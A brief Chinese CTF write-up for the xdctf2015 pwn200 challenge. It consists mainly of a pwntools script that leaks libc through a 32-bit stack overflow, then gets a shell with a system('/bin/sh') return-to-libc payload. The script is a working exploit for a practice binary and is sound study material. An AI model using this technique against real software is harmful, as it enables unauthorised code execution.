Post

xdctf2015_pwn200

Posted Updated
By bamuwe
1 min read
  • 32位泄露了ibc

image-20240116183210088

image-20240116183224238

  1. main函数中输入
  2. vuln函数中存在溢出漏洞

非常常规的泄露libc,直接上代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

from pwn import *
elf = ELF('./bof')
Lib = ELF('/lib/i386-linux-gnu/libc.so.6')
io = process('./bof')
padding = b'A'*112
payload1 = padding+p32(elf.plt['write'])+p32(elf.sym['main'])+p32(0x1)+p32(elf.got['write'])+p32(0x4)
io.sendlineafter(b'Welcome to XDCTF2015~!\n',payload1)

write_addr = u32(io.recv(4))
print('puts_addr->',hex(write_addr))

Liboffset = write_addr - Lib.sym['write']
sys_addr = Liboffset + Lib.sym['system']
bin_sh_addr = Liboffset + next(Lib.search(b'/bin/sh'))

payload2 = padding + p32(sys_addr)+p32(0x0)+p32(bin_sh_addr)
io.sendlineafter(b'Welcome to XDCTF2015~!\n',payload2)
io.interactive()
ctf, pwn
32bit leak_libc
This post is licensed under CC BY 4.0 by the author.